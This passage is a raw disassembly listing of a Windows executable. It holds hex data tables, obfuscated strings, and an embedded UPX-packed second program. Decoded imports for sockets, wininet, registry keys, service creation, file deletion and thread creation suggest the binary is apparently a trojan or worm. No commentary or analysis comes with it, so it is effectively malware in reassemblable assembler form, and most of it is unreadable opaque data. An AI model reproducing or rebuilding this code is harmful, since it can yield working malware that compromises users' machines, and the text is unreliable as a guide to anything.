dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
byte_44220A db 0 ; DATA XREF: sub_403BBF+17�o
aD?dK db 'D-?d# K',0 ; DATA XREF: sub_403BBF+34�o
aY db '*y',0 ; DATA XREF: sub_403BBF+B8�o
aCl6gK db 'Cl6g&k&',0 ; DATA XREF: sub_403BBF+D1�o
dword_44221E dd 5F2E27h ; DATA XREF: sub_403BBF+DE�r
a89vb db '89',0 ; DATA XREF: sub_403BBF+102�o
aCkrW@g db 'ckR%W@g',0 ; DATA XREF: sub_403BBF+12E�o
aU3 db 'U3',0 ; DATA XREF: sub_403D2D+17�o
word_442232 dw 20h ; DATA XREF: sub_403D2D+12E�r
byte_442234 db 0 ; DATA XREF: sub_403D2D+162�o
aPg db ' pG!',0 ; DATA XREF: sub_403D2D+173�o
aP db 'p ',0 ; DATA XREF: sub_403D2D+1EF�o
aQ db 'q ',0 ; DATA XREF: sub_403D2D+2B6�o
aNnNX db 'nN#n=X',0 ; DATA XREF: sub_40409C+16�o
aFB db '$f',27h,'',0 ; DATA XREF: sub_4040C4+F�o
dword_44224C dd 806371h ; DATA XREF: sub_4040C4+22�r
word_442250 dw 80h ; DATA XREF: sub_4040C4+2A�r
align 4
dd 8, 10h
dword_44225C dd 76h ; DATA XREF: sub_404170+D�r
; sub_404170:loc_404196�r ...
aXk db 'xk|#',0 ; DATA XREF: sub_4041FC+21�o
byte_442265 db 0 ; DATA XREF: sub_4041FC+67�o
aI db '%i',0 ; DATA XREF: sub_4041FC+78�o
dword_442269 dd 365223h ; DATA XREF: sub_4041FC+1C9�r
word_44226D dw 38h ; DATA XREF: sub_4041FC+1E0�r
byte_44226F db 44h ; DATA XREF: sub_4041FC+1F3�o
db 4Ch, 0
aBzvype db 'BzVYpE',0 ; DATA XREF: sub_4041FC+2D2�o
align 4
dw 7
unicode 0, <>,0
dd 11h
dword_442284 dd 0 ; DATA XREF: sub_404525+D�r
; sub_404525:loc_40454B�r ...
dword_442288 dd 0 ; DATA XREF: sub_4045BD+16�r
; sub_4045BD+43�r ...
dword_44228C dd 0 ; DATA XREF: sub_4045BD+B�o
dd 6, 0Fh
dword_442298 dd 0 ; DATA XREF: sub_40469F+D�r
; sub_40469F:loc_4046CC�r ...
a5gl db '/% 5gl;',0 ; DATA XREF: sub_40472A+2F�o
aSa db '* S',0 ; DATA XREF: sub_40479E+6�o
aSWrH db 's+wR~H',0 ; DATA XREF: sub_40479E+87�o
a7 db '7^',0 ; DATA XREF: sub_40479E+C2�o
word_4422B3 dw 3Ch ; DATA XREF: sub_404A48+F�r
aJ@6lO db 'j@6l^o',0 ; DATA XREF: sub_404A48+2E�o
asc_4422BC db '&<',0 ; DATA XREF: sub_404DE3+4C�o
aM db '~M',0 ; DATA XREF: sub_404DE3+154�o
align 4
dword_4422C4 dd 6 ; DATA XREF: sub_405249:loc_4052C8�r
dword_4422C8 dd 0Fh ; DATA XREF: sub_405249:loc_4052A6�r
dword_4422CC dd 0 ; DATA XREF: sub_40500D+D�r
; sub_40500D:loc_40503A�r ...
aAnvf db 'AnVF * ',0 ; DATA XREF: sub_405098+88�o
dword_4422D8 dd 0 ; DATA XREF: sub_405098+159�o
dword_4422DC dd 6 ; DATA XREF: sub_405415+70�r
; sub_4063C4+331�r
dword_4422E0 dd 0Ah ; DATA XREF: sub_4056CB+131�r
; sub_406073+204�r ...
dword_4422E4 dd 0 ; DATA XREF: sub_40531B+E�r
; sub_40531B:loc_405349�r ...
dword_4422E8 dd 0 ; DATA XREF: sub_4063C4+63�o
a9jA5_4 db '9J`A5.4',0 ; DATA XREF: sub_405415+2A�o
aU db ',U >',0 ; DATA XREF: sub_405415+52�o
aOOx db 'O%OX',0 ; DATA XREF: sub_405415+96�o
aFqvm db 'fqVM&',0 ; DATA XREF: sub_405415+C6�o
dword_442304 dd 8161677Fh ; DATA XREF: sub_405415+E4�o
db 0
aWvyj db 'wvyJ',0 ; DATA XREF: sub_405415+142�o
word_44230E dw 35h ; DATA XREF: sub_4055F7+C�r
aEq db '`EQ-',0 ; DATA XREF: sub_4056CB+82�o
word_442315 dw 31h ; DATA XREF: sub_4056CB+E0�r
word_442317 dw 2Dh ; DATA XREF: sub_4056CB+ED�r
aQbj8 db 'qj>8',0 ; DATA XREF: sub_4056CB+174�o
aWfzvk db 'WfZvk',0 ; DATA XREF: sub_4056CB+1A5�o
byte_442325 db 0 ; DATA XREF: sub_4056CB+258�o
a9osO db '9Os,O',0 ; DATA XREF: sub_4056CB+37A�o
aI? db 'i?',0 ; DATA XREF: sub_4056CB+70A�o
word_44232F dw 42h ; DATA XREF: sub_4056CB+7D9�r
byte_442331 db 20h, 3Fh, 0 ; DATA XREF: sub_4056CB+7FE�o
byte_442334 db 0 ; DATA XREF: sub_4056CB+8FC�o
aQu_d db 'qu.d',0 ; DATA XREF: sub_406073+16�o
byte_44233A db 0 ; DATA XREF: sub_406073+2E�o
byte_44233B db 46h ; DATA XREF: sub_406073+52�o
dd 716A455Eh
db 7Fh, 0
word_442342 dw 4350h ; DATA XREF: sub_406073+86�o
db 0
word_442345 dw 20h ; DATA XREF: sub_406073+128�r
word_442347 dw 20h ; DATA XREF: sub_406073+23A�r
aLum_ db 'lum&_',0 ; DATA XREF: sub_4063C4+55�o
word_44234F dw 3Dh ; DATA XREF: sub_4063C4+129�r
byte_442351 db 0 ; DATA XREF: sub_4063C4+38C�o
aFucxB6 db 'FUCX',27h,'b6',0 ; DATA XREF: sub_4063C4+3AF�o
aDr db '&:&dr',0 ; DATA XREF: sub_4063C4+3ED�o
dword_442360 dd 5 ; DATA XREF: sub_406B58+CC�r
dd 11h
dword_442368 dd 0 ; DATA XREF: sub_406937+C�r
; sub_406937:loc_40695C�r ...
dword_44236C dd 0 ; DATA XREF: sub_406B58+2F�w
; sub_406B58+3E�r ...
dword_442370 dd 0 ; DATA XREF: sub_406A03+10�r
; sub_406A03+19�r ...
dword_442374 dd 0FFFFh ; DATA XREF: sub_406B58+23�r
; sub_406B58+14F�r ...
aYScl db 'y |SCl',0 ; DATA XREF: sub_406A03+27�o
a89vb_0 db '89',0 ; DATA XREF: sub_406A6B+19�o
aCkrW@g_0 db 'ckR%W@g',0 ; DATA XREF: sub_406A6B+37�o
dword_44238C dd 837E20h ; DATA XREF: sub_406A6B+B8�r
aTm4 db 'tm4 ',0 ; DATA XREF: sub_406B58+16�o
aP_0 db 'p ',0 ; DATA XREF: sub_406B58+52�o
aVh4zA db 'H4z+ a',0 ; DATA XREF: sub_406B58+92�o
word_4423A0 dw 20h ; DATA XREF: sub_406B58+AE�r
aNnNX_0 db 'nN#n=X',0 ; DATA XREF: sub_406B58+12A�o
word_4423A9 dw 80h ; DATA XREF: sub_406B58:loc_406CD0�r
aPt db 'pt^ ',0 ; DATA XREF: sub_406B58+210�o
dword_4423B0 dd 7 ; DATA XREF: sub_406EA8+EAF�r
dword_4423B4 dd 0Bh ; DATA XREF: sub_406EA8+E82�r
; sub_406EA8+EE2�r ...
dword_4423B8 dd 0 ; DATA XREF: sub_406E1B+15�r
; sub_406E1B:loc_406E49�r ...
dword_4423BC dd 1 ; DATA XREF: sub_407F79+68�r
; sub_40802E+19�o
byte_4423C0 db 0 ; DATA XREF: sub_406EA8+F7E�r
align 2
dw 4333h
dd 7F3E4Ch
a1Nuf db '1+nuf',0 ; DATA XREF: sub_406EA8+16�o
aT_1 db 'T ',0 ; DATA XREF: sub_406EA8+103�o
aM7x db 'M&7X<',0 ; DATA XREF: sub_406EA8+12A�o
aFauI db 'fu,I',0 ; DATA XREF: sub_406EA8+1B6�o
aTyVj db 'TY Vj',0 ; DATA XREF: sub_406EA8+1CA�o
dword_4423E4 dd 78442Dh ; DATA XREF: sub_406EA8+24B�r
word_4423E8 dw 4Ch ; DATA XREF: sub_406EA8:loc_407148�r
dword_4423EA dd 745071h ; DATA XREF: sub_406EA8+31A�r
word_4423EE dw 5A59h ; DATA XREF: sub_406EA8+32F�o
db 0
aKer db '~kER',0 ; DATA XREF: sub_406EA8+487�o
a@mB1 db '@m|~b1',0 ; DATA XREF: sub_406EA8+54F�o
dword_4423FD dd 242F4Fh ; DATA XREF: sub_406EA8+5F9�r
byte_442401 db 69h, 77h, 0 ; DATA XREF: sub_406EA8+76F�o
dword_442404 dd 3E807Fh ; DATA XREF: sub_406EA8+796�r
byte_442408 db 4Dh, 72h, 0 ; DATA XREF: sub_406EA8+820�o
byte_44240B db 20h ; DATA XREF: sub_406EA8+910�o
db 20h, 0
a1rgk db '1Rgk',0 ; DATA XREF: sub_406EA8+952�o
word_442413 dw 44h ; DATA XREF: sub_406EA8+967�r
word_442415 dw 33h ; DATA XREF: sub_406EA8+9F5�r
aP_1 db '&p|*',0 ; DATA XREF: sub_406EA8+A2B�o
byte_44241C db 0 ; DATA XREF: sub_406EA8+B6B�o
aVG_tM db ' .T<m',0 ; DATA XREF: sub_406EA8+BBA�o
aBktcd db 'BKTcd',0 ; DATA XREF: sub_406EA8+C6E�o
aE0zf6 db 'e0zf6',0 ; DATA XREF: sub_406EA8+E05�o
dword_442431 dd 507232h ; DATA XREF: sub_406EA8+F8C�r
aANfd db ' nfd',0 ; DATA XREF: sub_406EA8+FAC�o
aG4ug7i db 'g4Ug,7I',0 ; DATA XREF: sub_406EA8+101A�o
aFmC db 'Fm>c`',0 ; DATA XREF: sub_406EA8+103D�o
byte_44244A db 0 ; DATA XREF: sub_407F79+8D�o
byte_44244B db 0FFh ; DATA XREF: sub_407F79+5�o
dd 0F5FFFFFFh, 407Fh
db 80h, 40h, 0
byte_442457 db 20h ; DATA XREF: sub_40802E+40�o
dd 6Ch, 3
dword_442460 dd 0Fh ; DATA XREF: sub_408165+247�r
dword_442464 dd 0 ; DATA XREF: sub_4080E2+D�r
; sub_4080E2:loc_40810F�r ...
a61xo db '61Xo+',0 ; DATA XREF: sub_408165+C�o
a7kq db '*7kq=',0 ; DATA XREF: sub_408165+DC�o
aEQbl db 'E;Qbl',0 ; DATA XREF: sub_408165+1A3�o
aMzr db 'MZ',0 ; DATA XREF: sub_408585+81�o
dw 3
dd 40000h, 0FFFF0000h, 0B80000h, 0
dd 400000h, 8 dup(0)
dd 0C80000h, 1F0E0000h, 0B4000EBAh, 0B821CD09h, 21CD4C01h
dd 73696854h, 6F727020h, 6D617267h, 6E616320h, 20746F6Eh
dd 72206562h, 69206E75h, 4F44206Eh, 6F6D2053h, 0D2E6564h
dd 240A0Dh, 13h dup(0)
dd 45500000h, 14C0000h, 88F20003h, 41CAh, 0
dd 0E00000h, 10B010Fh, 40000006h, 10000000h, 50000000h
dd 98200000h, 60000000h, 0A0000000h, 0
dd 10000040h, 2000000h, 40000h, 0
dd 40000h, 0
dd 0B0000000h, 10000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 0A0000000h, 0D80000h, 1Ch dup(0)
dd 50550000h, 3058h, 50000000h, 10000000h, 0
dd 4000000h, 3 dup(0)
dd 800000h, 5055E000h, 3158h, 40000000h, 60000000h, 3A000000h
dd 4000000h, 3 dup(0)
dd 400000h, 5055E000h, 3258h, 10000000h, 0A0000000h, 2000000h
dd 3E000000h, 3 dup(0)
dd 400000h, 0C000h, 42h dup(0)
db 0Ah
align 2
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dw 5055h
dd 90C2158h, 0A530902h, 0A837A262h, 72695F94h, 381F0000h
dd 70000000h, 4260000h, 7EE93800h, 4D009208h, 300905Ah
dd 3200043Bh, 0FFFFB2C8h, 0F97F40B8h, 4C8377Fh, 0EBA1F0Eh
dd 0CD09B400h, 4C01B821h, 73696854h, 0FDBF7020h, 6F72FFFFh
dd 6D617267h, 6E616320h, 20746F6Eh, 72206562h, 69206E75h
dd 534F4402h, 50ED6D20h, 646FFF60h, 0D0D2E65h, 50C7240Ah
dd 0DBED1345h, 14CFF21h, 888A0002h, 9DE041CAh, 6010B21h
dd 7EE90F08h, 0E022B3h, 10E018A4h, 0F9257325h, 20B6366h
dd 604501Eh, 0C96E676h, 710341Eh, 0F65E5920h, 29E0A006h
dd 0B2017578h, 17C6FDDh, 4D3864D8h, 37903F76h, 7865742Eh
dd 20A22B74h, 96CB6FFBh, 41A00EBh, 65722EE0h, 0CC636F6Ch
dd 677BECA6h, 2623FB9Eh, 107942A2h, 3703D95h, 2CDB3034h
dd 1226669Bh, 46E22FFAh, 9A691B30h, 0B423BAEh, 5E14032Ch
dd 0CD34D36Eh, 562C4AB2h, 4D867062h, 9C4D34D3h, 0E2D4C2AEh
dd 59AE9AF2h, 182D0836h, 463C0728h, 69A69A69h, 786C6254h
dd 9A69B28Eh, 0C6B49EA6h, 4D2F02E2h, 0F4CDB9D3h, 3972E0Ah
dd 344C3C24h, 5C34D34Dh, 9A8A7C6Ah, 0D34D34DBh, 0E6CEC0AAh
dd 59BF2EF2h, 243BA776h, 0F4031087h, 69A6E42Bh, 0CAD4A69Ah
dd 0BAACB6C0h, 0A29A6D60h, 0D72B9098h, 7B66B27Fh, 9603E9B6h
dd 78132F8Ah, 0FF880330h, 66D217FFh, 4F538130h, 41575446h
dd 4D5C4552h, 6F726369h, 0E5666F73h, 74FFFFFFh, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 0FB7F6853h, 536CDB6Fh, 6528760Ch, 656A624Fh, 10447463h
dd 6F4C7961h, 0AD6E6461h, 39477015h, 6739082Bh, 0A5FF3F4Dh
dd 0DB6C2006h, 72617041h, 6E656D74h, 0FA6E495Ch, 53035EDFh
dd 33023B63h, 4C430032h, 5C444953h, 0E77ED923h, 257B00BBh
dd 2D583830h, 0FA5D3404h, 7D0361DBh, 0FCEC8323h, 0F0E89090h
dd 0DEF75706h, 60BAFBBh, 78453759h, 7C737469h, 6046DE82h
dd 62694CFBh, 3B797172h, 656E686Bh, 0BF6ED76Ch, 5FB5DF67h
dd 57791B54h, 7DF60FD5h, 0B565DBFBh, 50677562h, 6CC76972h
dd 23656765h, 7850305Ch, 642E1ED7h, 50580F2Bh, 6F114F4Ch
dd 33D5B737h, 21727270h, 2B6261C5h, 6F667364h, 62360DECh
dd 732E126Fh, 35CBB79h, 0B835A0DDh, 5C214964h, 64723A5Dh
dd 8FB10B7Fh, 5F74511Ah, 5CEC1F33h, 65704F5Fh, 0FE57B218h
dd 4478566Eh, 706E6148h, 0B5AC006Eh, 2D4D37FFh, 4B59542Dh
dd 46475157h, 0E0A4A48h, 0F9ED6113h, 4245411Fh, 48534159h
dd 5B25464Ch, 7B096702h, 32020EFh, 30231205h, 0B0EF7BEEh
dd 0B3A0F32h, 1E331504h, 7FFC8360h, 4A455767h, 4A464B57h
dd 0AB414557h, 0FE9A13BBh, 5349444Eh, 1A034452h, 0A200FF97h
dd 0CBCB901Fh, 1FA60B6Eh, 91218D0Fh, 0A4BCB921h, 31232319h
dd 6D253525h, 0D97FD3h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 57740150h
push 24h
dec ch
imul ch
adc eax, 8D1E112Ch
inc ebp
lock push eax
or [eax], ebp
movzx eax, word ptr [ebp-6]
push eax
mov esi, ds:74F3CF20h
iret
; ---------------------------------------------------------------------------
db 0Ah, 0FCh, 50h
dd 0F6F8FE04h, 0FB9B66F4h, 858D50F7h, 0F0755B78h, 3826C068h
dd 36CD10D6h, 0B017ECBBh, 14B468FEh, 0B76A0C4Fh, 4FB7F1Dh
dd 0F9F75999h, 0C283DC5Fh, 2A505205h, 345DD60Ch, 73BDCC10h
dd 38C4832Fh, 68502715h, 3B8129B0h, 5B7776DBh, 80A0BF8Fh
dd 12285750h, 5214220Fh, 647736Eh, 373015A4h, 7D330876h
dd 1766E6B0h, 6A2C310Bh, 0D8986809h, 0C9ECE761h, 28458830h
dd 66FDDB9Fh, 7909372Fh, 68234068h, 77866E02h, 606C986Eh
dd 0C95E5F12h, 0AEF22C3h, 18E11BEFh, 0A91D8B53h, 0FF336726h
dd 0EFFC7D89h, 0FFFCFF0Ah, 10C083D3h, 312C8950h, 0F08BDC1Ch
dd 0FF73B59h, 0EFDB2384h, 6A4937BAh, 3AE4680Ah, 21D1756h
dd 468D056Ah, 0DFB7F00Fh, 0F817B16h, 0D3B41859h, 0F467640h
dd 730FED6Ch, 570C1509h, 24122068h, 3FFB1475h, 0C73BDED9h
dd 18090E75h, 0EB026A04h, 0F84D8D23h, 1337F351h, 111CB3DBh
dd 5E2A2BF8h, 0C2105021h, 823B6EEDh, 5803FA08h, 840A13E9h
dd 0DD77FB62h, 300068F7h, 4C2E5783h, 3BD88B1Fh, 687D74DFh
dd 3AD95C14h, 10481BB7h, 0B70A0468h, 60440EF4h, 6ABFBB6Fh
dd 58F88BF6h, 2B58F868h, 3F45AC3h, 0C28D16F8h, 89F1F4BFh
dd 0CB2BC87Eh, 4689C103h, 7E22210Bh, 0E10DB86Eh, 23B05356h
dd 33E81040h, 0EC6FEEF6h, 0F43C2DFh, 56535056h, 8C3C1656h
dd 770974C6h, 9B8D17EEh, 0C710EB38h, 7EB0431h, 0ECDF3508h
dd 1A250699h, 7D8B0711h, 6A1611Bh, 51615B60h, 0F605746h
dd 66DF8E31h, 61FC96BBh, 0AF0F5424h, 0EB4A31Ch, 75FFFFDEh
dd 0B907A121h, 35247621h, 7BFBC069h, 0C82B7F7Ch, 0C2126851h
dd 2BD998EDh, 0D0F71D58h, 2D2474BFh, 0C7DCF6FBh, 155CC701h
dd 500CA756h, 6BCC033h, 0CA1DD33h, 0A1609A6Bh, 1A3B6C5Dh
dd 0D956D913h, 641A206Ah, 9D8DB438h, 0A2F0DE08h, 0B73816ECh
dd 3019D866h, 0F8C3522Eh, 0DA1B6B02h, 0E10C7DBh, 106A1301h
dd 0E9B3D537h, 14FCAD99h, 284BC610h, 0CD73A702h, 0FDD8780Dh
dd 7C514104h, 7A799D23h, 13E01511h, 59B5E078h, 44CF1F92h
dd 0DB541112h, 0ED372E9h, 83F08B74h, 3902F74h, 5B64D9E8h
dd 0A0567832h, 9D351270h, 6C572119h, 1F5E681Bh, 8986EF8Dh
dd 0DB33537Dh, 64405357h, 6FBDEE90h, 5B83E70Bh, 0BE566C74h
dd 0BF6AA218h, 538C6667h, 890F087Fh, 575015B5h, 3FD2D3ECh
dd 74C0858Ah, 67849F36h, 0E19939D6h, 74766CE6h, 84202613h
dd 71E3EB15h, 5B359BE1h, 895BFC14h, 0FC6157D9h, 5E3FB067h
dd 5B5FC38Bh, 5D8B048Dh, 53575608h, 0FDBEB7FEh, 3D66590Eh
dd 3F76C88Bh, 3C80D144h, 0D745C1Ah, 0FF6DC181h, 151FAF6Fh
dd 0EBEC77C9h, 3B664101h, 1B2373C8h, 0BE17FFC9h, 6DF002B4h
dd 1778F12Bh, 8148DC5h, 1A148A47h, 61059488h, 6D7B6376h
dd 7E6DC718h, 0C62F7AEBh, 90A618B7h, 245C644Ch, 0AF9D560Ch
dd 57FFDDB7h, 10247C8Bh, 197EDB85h, 2EAB0A6Eh, 7D1A6AC0h
dd 0FFFEE678h, 8861C280h, 3B463E14h, 80E77CF3h, 32001F24h
dd 2C02109Fh, 8FFFF8ECh, 84D8B0Ch, 0D895648h, 777550BCh
dd 237BF0C6h, 0A151930Bh, 536FF898h, 0B0B64F84h, 0FC1BDA0Bh
dd 2404C711h, 7B01C75Ch, 59D676F6h, 2E7559D7h, 13546815h
dd 0B37ECBF0h, 93B4E1Ah, 4080B27h, 0E1610CEBh, 68F1BDAFh
dd 0A929193Ch, 505959E0h, 95F7C358h, 0CC27027h, 1703189Bh
dd 0B3637289h, 6801FB3Dh, 0D1261294h, 3DA88F59h, 85BD95B7h
dd 1FE934Fh, 0BF5D940Eh, 64C9C9ADh, 7B575D9Ch, 7C9DF8F0h
dd 30BB6D93h, 9F6880A5h, 0B44EB1E1h, 0C0A359CDh, 0ACA43F00h
dd 315F5F7Bh, 12353C7Ch, 960C7024h, 4505B36Eh, 0E564BFA0h
dd 5A786657h, 6DB755A0h, 9B9C2613h, 5FDB93Dh, 0E8E6EBEBh
dd 34680CFCh, 6CC7580Ah, 7B167716h, 2733756Ah, 5F17E15Dh
dd 0E804F7E3h, 0E69FD8CDh, 0A2F18B76h, 0C79CFC18h, 41135006h
dd 0E3998C65h, 196A1A1Dh, 0B60514C0h, 26108D66h, 1F20B710h
dd 57816E74h, 257126Dh, 6F09B0C3h, 0D7611EB5h, 0B7518C8h
dd 2DC05935h, 147E89FFh, 57571CEBh, 0AC470957h, 3EB799BEh
dd 99741446h, 16012046h, 5FC68B1Ch, 0C6D77F68h, 6283568Dh
dd 44F6420Fh, 20010824h, 11DB66D8h, 1D5920D6h, 3DA21B5Eh
dd 0FB59BB6Fh, 9D5C8BEAh, 74037468h, 0DB768BD7h, 14ED95A3h
dd 5609F685h, 752A6146h, 0B7F6FB7Fh, 0F03BDF1Ch, 718D0375h
dd 8318515Bh, 392527FAh, 6752045h, 0FDB035B2h, 5104C183h
dd 20D003EBh, 14021847h, 0D674B3F5h, 4552AF10h, 1CC25DB4h
dd 0D8055EB6h, 7AC4B870h, 0E510E41Ah, 4FF42BEh, 20C46818h
dd 896A9A7Ah, 0CED8C847h, 86A00E4h, 0D8C8CC18h, 0C4202BD8h
dd 4C351016h, 0D03211D9h, 0B08D18D4h, 0B2C1A05h, 0D81B6914h
dd 8E7C1D19h, 0A04514h, 565E5308h, 12CC170Ah, 4D61605Eh
dd 660BB8FCh, 940AC604h, 83ABC040h, 0DDEDC0B3h, 21170BDh
dd 0EA8B0575h, 12CB3CEBh, 0C187CD06h, 6810AFBCh, 1A8A53A4h
dd 36276FCh, 3931EB76h, 0BA5D0C7Dh, 191E05D2h, 2EB17D0h
dd 5BB81EE0h, 30F6DD6Bh, 8D00575Fh, 0DC91AE71h, 344AC57Eh
dd 0E942189h, 6DAE08C2h, 0BF98F138h, 78570880h, 12DB098Eh
dd 85E8BEFh, 2F0C331h, 74C3FDF4h, 7449205Ch, 0C7C82C14h
dd 0A2659BA1h, 7AC4660Dh, 5C68DD4Ah, 4D6D46E2h, 510CEFE8h
dd 63FFBA4Fh, 0FC26F135h, 0C01BD8F7h, 5FC2456h, 9B5071E4h
dd 6FC5D483h, 0E59518A8h, 0B36AC503h, 0FFB191B7h, 753BC445h
dd 93C0940Fh, 1F068FB6h, 4A3EF9D9h, 0B18BCC26h, 4D17DE35h
dd 6895910h, 0CFA69106h, 0B986F977h, 8A040883h, 1010E04h
dd 5D270C46h, 106D78FBh, 7AD518E7h, 534244C7h, 76398D9Dh
dd 0F66AD943h, 57465945h, 0B2436206h, 3D06CB3Eh, 2B6DF6AAh
dd 0B54CB46Ch, 89630CC9h, 4B565F01h, 5DDC6214h, 418B4C5Bh
dd 0B455A420h, 314CDED6h, 3F6856E1h, 5D00A4CFh, 88661647h
dd 5741415h, 336CEB67h, 0A6278CDCh, 1DA9AAh, 9C1B6332h
dd 0F5E6803h, 2F6DB804h, 66602061h, 573B60Fh, 0BB648AFBh
dd 9897785Eh, 1261C10Bh, 52135868h, 0FBC228D0h, 0A1642E21h
dd 25896408h, 0C7CEA307h, 0D22CDDC6h, 0A5E86589h, 27240C29h
dd 7BD757F4h, 30BBBB0h, 0F86850C3h, 0B76CC0Ah, 4014E4B4h
dd 0E12E0F40h, 0B916D170h, 0AF3861E0h, 0A9522B34h, 6BFBF192h
dd 9B6990B3h, 94DC1AFAh, 85930D9Bh, 4390A153h, 5B4F9493h
dd 16F8B6EBh, 42392FE4h, 45F7DB08h, 0DA2DC0BFh, 7C5B3BC8h
dd 201E7C80h, 44C60573h, 6FE25A6Dh, 0EB402E06h, 1F76FFE9h
dd 0E0757546h, 86E1BC3h, 0E00381AEh, 0B9616480h, 3105BAB1h
dd 4D450CCh, 0A6DDA60Ch, 1D5FA246h, 50DA1E08h, 0CF3CD804h
dd 0D4D63CF3h, 9ED2CECCh, 46D979E7h, 746B60Ah, 6A040506h
dd 18F9EF9Eh, 2040308h, 53B60601h, 6A716023h, 58859215h
dd 0E8130340h, 98C95790h, 0BF723EC4h, 0C49A8598h, 50AE2350h
dd 6B6F683Fh, 21D00ADCh, 59504208h, 623E3786h, 0C483D911h
dd 0D20EEBFFh, 0C2BE1696h, 0C758BC3h, 0F185598Bh, 37D3D907h
dd 0CF1CBEFAh, 0E07D83h, 160EE070h, 96841A46h, 0B4F072CCh
dd 8A70F20Dh, 0D8FBCE71h, 0C9F0F468h, 0C8833811h, 0CDF6ABFFh
dd 9FA17C2Ch, 3B0C55C0h, 0D7992D6h, 0B42E9EA5h, 1DE677FCh
dd 7AF286E4h, 0BB4BFFFFh, 0CE8B135Eh, 0CA3BDCA6h, 48A2973h
dd 0C0458839h, 972303Ch
dd 1D73393Ch, 7D778F4Dh, 0D6AC0F8h, 74B84B0Ah, 8BE4797Fh
dd 6EBD8F1h, 0FD0EB41h, 28850F39h, 0BD1FEDBCh, 3BF64A8Dh
dd 5C1548F1h, 0DFFFFD73h, 8D0088D1h, 0C13B144Eh, 0C23B2A7Dh
dd 0C8A2673h, 0BC4D8838h, 9A2DF980h, 0A53B6B1h, 0C9595404h
dd 37DBDB77h, 253075DBh, 65830409h, 391000D4h, 0AFA0D44Dh
dd 76DED966h, 3B568DBFh, 8A1F75C2h, 0D8E8B838h, 80C9A78h
